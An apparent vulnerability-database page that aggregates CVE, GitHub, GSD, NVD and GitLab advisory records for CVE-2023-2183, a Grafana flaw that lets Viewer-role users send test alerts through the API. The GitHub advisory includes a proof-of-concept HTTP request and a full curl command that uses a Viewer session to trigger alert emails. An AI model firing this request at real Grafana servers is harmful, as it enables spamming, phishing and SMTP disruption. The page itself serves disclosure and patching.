Action not permitted
Modal body text goes here.
cve-2023-2183
Vulnerability from cvelistv5
▼ | Vendor | Product |
---|---|---|
Grafana | Grafana | |
Grafana | Grafana Enterprise |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:12:20.655Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://grafana.com/security/security-advisories/cve-2023-2183/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230706-0002/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Grafana", "vendor": "Grafana", "versions": [ { "lessThan": "8.5.26", "status": "affected", "version": "8.0.0", "versionType": "semver" }, { "lessThan": "9.2.19", "status": "affected", "version": "9.0.0", "versionType": "semver" }, { "lessThan": "9.3.15", "status": "affected", "version": "9.3.0", "versionType": "semver" }, { "lessThan": "9.4.12", "status": "affected", "version": "9.4.0", "versionType": "semver" }, { "lessThan": "9.5.3", "status": "affected", "version": "9.5.0", "versionType": "semver" } ] }, { "product": "Grafana Enterprise", "vendor": "Grafana", "versions": [ { "lessThan": "8.5.26", "status": "affected", "version": "8.0.0", "versionType": "semver" }, { "lessThan": "9.2.19", "status": "affected", "version": "9.0.0", "versionType": "semver" }, { "lessThan": "9.3.15", "status": "affected", "version": "9.3.0", "versionType": "semver" }, { "lessThan": "9.4.12", "status": "affected", "version": "9.4.0", "versionType": "semver" }, { "lessThan": "9.5.3", "status": "affected", "version": "9.5.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\u003cp\u003eGrafana is an open-source platform for monitoring and observability. \u003c/p\u003e\u003cp\u003eThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\u003c/p\u003e\u003cp\u003eThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\u003c/p\u003e\u003cp\u003eUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\u003c/p\u003e" } ], "value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n" } ], "impacts": [ { "capecId": "CAPEC-180", "descriptions": [ { "lang": "en", "value": "CAPEC-180" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-284", "description": "CWE-284", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-06-06T18:04:26.485Z", "orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da", "shortName": "GRAFANA" }, "references": [ { "url": "https://grafana.com/security/security-advisories/cve-2023-2183/" }, { "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3" }, { "url": "https://security.netapp.com/advisory/ntap-20230706-0002/" } ] } }, "cveMetadata": { "assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da", "assignerShortName": "GRAFANA", "cveId": "CVE-2023-2183", "datePublished": "2023-06-06T18:04:26.485Z", "dateReserved": "2023-04-19T12:11:08.488Z", "dateUpdated": "2024-08-02T06:12:20.655Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2023-2183\",\"sourceIdentifier\":\"security@grafana.com\",\"published\":\"2023-06-06T19:15:11.277\",\"lastModified\":\"2023-07-06T19:15:10.047\",\"vulnStatus\":\"Modified\",\"evaluatorComment\":\"Impact \",\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grafana is an open-source platform for monitoring and observability. \\n\\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\\n\\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\\n\\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\\n\\n\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\",\"baseScore\":6.4,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":3.1,\"impactScore\":2.7},{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\",\"baseScore\":4.1,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":2.3,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-862\"}]},{\"source\":\"security@grafana.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"8.0.0\",\"versionEndExcluding\":\"8.5.26\",\"matchCriteriaId\":\"48AB6EAA-1211-4E49-938E-7A6C57914A5B\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"9.0.0\",\"versionEndExcluding\":\"9.2.19\",\"matchCriteriaId\":\"60ED286C-003F-4D81-B26C-8B39A33B1327\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"9.3.0\",\"versionEndExcluding\":\"9.3.15\",\"matchCriteriaId\":\"C45A8C03-0871-4F08-8285-EA8EF5B91132\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"9.4.0\",\"versionEndExcluding\":\"9.4.12\",\"matchCriteriaId\":\"F7E1DC65-AEE9-4296-98A8-B0F8C0794B39\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"9.5.0\",\"versionEndExcluding\":\"9.5.3\",\"matchCriteriaId\":\"109E940E-B6B4-4E5A-A580-C58A26CD4392\"}]}]}],\"references\":[{\"url\":\"https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3\",\"source\":\"security@grafana.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://grafana.com/security/security-advisories/cve-2023-2183/\",\"source\":\"security@grafana.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20230706-0002/\",\"source\":\"security@grafana.com\"}]}}" } }
ghsa-cvm3-pp2j-chr3
Vulnerability from github
Summary
Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.
Reason for the error: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.
This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.
Details
The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.
View of the panel for the user in the Viewer role:
Admin role - View panel for admin role:
Admin role - Next step – editing:
Admin role - Additional options:
PoC
HTTP Request by user in role Viewer ``` POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1 Host: xxx Cookie: grafana_session=xxx Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana accept: application/json, text/plain, / content-type: application/json …
{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"test@example.com", "singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}], "alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com", "more":"http://example.com "},"labels":{}}}
```
HTTP Response: ``` HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Expires: -1 Pragma: no-cache X-Content-Type-Options: nosniff X-Frame-Options: deny X-Xss-Protection: 1; mode=block Date: Wed, 05 Apr 2023 10:43:00 GMT Content-Length: 471
{"alert":{"annotations":{"value_string":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst", "more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test", "testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}}, "receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}], "notified_at":"2023-04-05T12:43:00.1430203+02:00"}
```
Result:
The attacker can send as a template alert or plain/text.
Impact
As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.
From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.
CURL example – using a user session in the Viewer role:
curl -i -s -k -X $'POST' \
-H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
-b $'grafana_session=xxx' \
--data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<test@example.com>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
$'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'
Mitigation
- In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
- Check the API for the possibility of accessing this endpoint for other roles than admin
{ "affected": [ { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "8.5.26" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.0.0" }, { "fixed": "9.2.19" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.3.0" }, { "fixed": "9.3.15" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.4.0" }, { "fixed": "9.4.12" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "github.com/grafana/grafana" }, "ranges": [ { "events": [ { "introduced": "9.5.0" }, { "fixed": "9.5.3" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2023-2183" ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2023-06-12T20:09:27Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "### Summary\nGrafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role. \n\n**Reason for the error**: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel. \n\nThis enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc\u2026), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.\n\n\n### Details\nThe logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert. \n\nView of the panel for the user in the Viewer role:\n![image](https://user-images.githubusercontent.com/1643385/232904030-e8a8338d-f5e3-4b04-80c3-32f2164a190e.png)\n\nAdmin role - View panel for admin role:\n![image](https://user-images.githubusercontent.com/1643385/232904264-c7aba0a5-0642-496b-998d-d500eb5ead7f.png)\n\nAdmin role - Next step \u2013 editing:\n![image](https://user-images.githubusercontent.com/1643385/232904388-ef2ee69e-3ee3-41a9-8687-305886c5c0b9.png)\n\nAdmin role - Additional options:\n![image](https://user-images.githubusercontent.com/1643385/232904480-dd493d34-d66d-47af-ab4f-3273ae8976bc.png)\n\n\n\n### PoC\n\n**HTTP Request by user in role Viewer**\n```\nPOST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1\nHost: xxx\nCookie: grafana_session=xxx\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana\naccept: application/json, text/plain, */*\ncontent-type: application/json\n\u2026\n\n{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"\u003ctest@example.com\u003e\",\n\"singleEmail\":true},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\n\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com \",\"description\":\"tekst\",\"testowy\":\"test http://example.com\",\n\"more\":\"http://example.com \"},\"labels\":{}}}\n\n```\n\n**HTTP Response:**\n```\nHTTP/1.1 200 OK\nCache-Control: no-cache\nContent-Type: application/json\nExpires: -1\nPragma: no-cache\nX-Content-Type-Options: nosniff\nX-Frame-Options: deny\nX-Xss-Protection: 1; mode=block\nDate: Wed, 05 Apr 2023 10:43:00 GMT\nContent-Length: 471\n\n{\"alert\":{\"annotations\":{\"__value_string__\":\"[ metric=\u0027foo\u0027 labels={instance=bar} value=10 ]\",\"description\":\"tekst\",\n\"more\":\"http://example.com\",\"runbook_url\":\"http://example.com\",\"summary\":\"Notification test\",\n\"testowy\":\"testowy http://example.com\"},\"labels\":{\"alertname\":\"TestAlert\",\"instance\":\"Grafana\"}},\n\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"name\":\"test\",\"uid\":\"ojUhNFL4k\",\"status\":\"ok\"}]}],\n\"notified_at\":\"2023-04-05T12:43:00.1430203+02:00\"}\n\n```\n\n## Result:\nThe attacker can send as a template alert or plain/text.\n\n![image](https://user-images.githubusercontent.com/1643385/232917993-1294cfe0-3040-4d04-a533-a72ecbc666c0.png)\n\n\n### Impact\nAs I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server. \n\nFrom a practical point of view, this means that for each \"GrafanaReceiver\" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged. \n\nCURL example \u2013 using a user session in the Viewer role:\n\n```\ncurl -i -s -k -X $\u0027POST\u0027 \\\n -H $\u0027Host: localhost:3002\u0027 -H $\u0027Content-Length: 386\u0027 -H $\u0027sec-ch-ua: \\\"Not:A-Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"112\\\"\u0027 -H $\u0027accept: application/json, text/plain, */*\u0027 -H $\u0027content-type: application/json\u0027 -H $\u0027x-grafana-org-id: 1\u0027 -H $\u0027sec-ch-ua-mobile: ?0\u0027 -H $\u0027User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36\u0027 -H $\u0027sec-ch-ua-platform: \\\"macOS\\\"\u0027 -H $\u0027Origin: http://localhost:3002\u0027 -H $\u0027Sec-Fetch-Site: same-origin\u0027 -H $\u0027Sec-Fetch-Mode: cors\u0027 -H $\u0027Sec-Fetch-Dest: empty\u0027 -H $\u0027Referer: http://localhost:3002/\u0027 -H $\u0027Accept-Encoding: gzip, deflate\u0027 -H $\u0027Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\u0027 -H $\u0027Connection: close\u0027 \\\n -b $\u0027grafana_session=xxx\u0027 \\\n --data-binary $\u0027{\\\"receivers\\\":[{\\\"name\\\":\\\"test\\\",\\\"grafana_managed_receiver_configs\\\":[{\\\"settings\\\":{\\\"addresses\\\":\\\"\u003ctest@example.com\u003e\\\",\\\"singleEmail\\\":true\\x0d\\x0a},\\\"secureSettings\\\":{},\\\"type\\\":\\\"email\\\",\\\"name\\\":\\\"test\\\",\\\"disableResolveMessage\\\":false}]}],\\\"alert\\\":{\\\"annotations\\\":{\\\"runbook_url\\\":\\\"http://example.com\\\",\\\"description\\\":\\\"tekst\\\",\\\"testowy\\\":\\\"testowy http://example.com\\\",\\x0d\\x0a\\\"more\\\":\\\"http://example.com\\\"\\x0d\\x0a},\\\"labels\\\":{}}}\\x0d\\x0a\u0027 \\\n $\u0027http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test\u0027\n```\n\n### Mitigation\n\n1. In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold. \n2. Check the API for the possibility of accessing this endpoint for other roles than admin\n", "id": "GHSA-cvm3-pp2j-chr3", "modified": "2023-06-12T20:09:27Z", "published": "2023-06-12T20:09:27Z", "references": [ { "type": "WEB", "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183" }, { "type": "PACKAGE", "url": "https://github.com/grafana/bugbounty" }, { "type": "WEB", "url": "https://grafana.com/security/security-advisories/cve-2023-2183" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "type": "CVSS_V3" } ], "summary": "Grafana has Broken Access Control in Alert manager: Viewer can send test alerts" }
gsd-2023-2183
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2023-2183", "id": "GSD-2023-2183" }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2023-2183" ], "details": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n", "id": "GSD-2023-2183", "modified": "2023-12-13T01:20:32.266750Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "security@grafana.com", "ID": "CVE-2023-2183", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Grafana", "version": { "version_data": [ { "version_affected": "\u003c", "version_name": "8.0.0", "version_value": "8.5.26" }, { "version_affected": "\u003c", "version_name": "9.0.0", "version_value": "9.2.19" }, { "version_affected": "\u003c", "version_name": "9.3.0", "version_value": "9.3.15" }, { "version_affected": "\u003c", "version_name": "9.4.0", "version_value": "9.4.12" }, { "version_affected": "\u003c", "version_name": "9.5.0", "version_value": "9.5.3" } ] } }, { "product_name": "Grafana Enterprise", "version": { "version_data": [ { "version_affected": "\u003c", "version_name": "8.0.0", "version_value": "8.5.26" }, { "version_affected": "\u003c", "version_name": "9.0.0", "version_value": "9.2.19" }, { "version_affected": "\u003c", "version_name": "9.3.0", "version_value": "9.3.15" }, { "version_affected": "\u003c", "version_name": "9.4.0", "version_value": "9.4.12" }, { "version_affected": "\u003c", "version_name": "9.5.0", "version_value": "9.5.3" } ] } } ] }, "vendor_name": "Grafana" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n" } ] }, "impact": { "cvss": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "version": "3.1" } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "cweId": "CWE-284", "lang": "eng", "value": "CWE-284" } ] } ] }, "references": { "reference_data": [ { "name": "https://grafana.com/security/security-advisories/cve-2023-2183/", "refsource": "MISC", "url": "https://grafana.com/security/security-advisories/cve-2023-2183/" }, { "name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3", "refsource": "MISC", "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3" }, { "name": "https://security.netapp.com/advisory/ntap-20230706-0002/", "refsource": "MISC", "url": "https://security.netapp.com/advisory/ntap-20230706-0002/" } ] } }, "gitlab.com": { "advisories": [ { "affected_range": "\u003c8.5.26||\u003e=9.0.0 \u003c9.2.19||\u003e=9.3.0 \u003c9.3.15||\u003e=9.4.0 \u003c9.4.12||\u003e=9.5.0 \u003c9.5.3", "affected_versions": "All versions before 8.5.26, all versions starting from 9.0.0 before 9.2.19, all versions starting from 9.3.0 before 9.3.15, all versions starting from 9.4.0 before 9.4.12, all versions starting from 9.5.0 before 9.5.3", "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "cwe_ids": [ "CWE-1035", "CWE-707", "CWE-862", "CWE-937" ], "date": "2023-06-12", "description": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n", "fixed_versions": [ "8.5.26", "9.2.19", "9.3.15", "9.4.12", "9.5.3" ], "identifier": "CVE-2023-2183", "identifiers": [ "GHSA-cvm3-pp2j-chr3", "CVE-2023-2183" ], "not_impacted": "All versions starting from 8.5.26 before 9.0.0, all versions starting from 9.2.19 before 9.3.0, all versions starting from 9.3.15 before 9.4.0, all versions starting from 9.4.12 before 9.5.0, all versions starting from 9.5.3", "package_slug": "go/github.com/grafana/grafana", "pubdate": "2023-06-12", "solution": "Upgrade to versions 8.5.26, 9.2.19, 9.3.15, 9.4.12, 9.5.3 or above.", "title": "Missing Authorization", "urls": [ "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3", "https://nvd.nist.gov/vuln/detail/CVE-2023-2183", "https://grafana.com/security/security-advisories/cve-2023-2183/", "https://github.com/advisories/GHSA-cvm3-pp2j-chr3" ], "uuid": "e11e36cf-de74-4268-bb9d-9fa96503d663" } ] }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "9.5.3", "versionStartIncluding": "9.5.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "9.4.12", "versionStartIncluding": "9.4.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "9.3.15", "versionStartIncluding": "9.3.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "9.2.19", "versionStartIncluding": "9.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.5.26", "versionStartIncluding": "8.0.0", "vulnerable": true } ], "operator": "OR" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "security@grafana.com", "ID": "CVE-2023-2183" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "Grafana is an open-source platform for monitoring and observability. \n\nThe option to send a test alert is not available from the user panel UI for users having the Viewer role. It is still possible for a user with the Viewer role to send a test alert using the API as the API does not check access to this function.\n\nThis might enable malicious users to abuse the functionality by sending multiple alert messages to e-mail and Slack, spamming users, prepare Phishing attack or block SMTP server.\n\nUsers may upgrade to version 9.5.3, 9.4.12, 9.3.15, 9.2.19 and 8.5.26 to receive a fix.\n\n" } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-862" } ] } ] }, "references": { "reference_data": [ { "name": "https://grafana.com/security/security-advisories/cve-2023-2183/", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://grafana.com/security/security-advisories/cve-2023-2183/" }, { "name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3", "refsource": "MISC", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-cvm3-pp2j-chr3" }, { "name": "https://security.netapp.com/advisory/ntap-20230706-0002/", "refsource": "MISC", "tags": [], "url": "https://security.netapp.com/advisory/ntap-20230706-0002/" } ] } }, "impact": { "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 2.7 } }, "lastModifiedDate": "2023-07-06T19:15Z", "publishedDate": "2023-06-06T19:15Z" } } }
wid-sec-w-2023-1384
Vulnerability from csaf_certbund
Notes
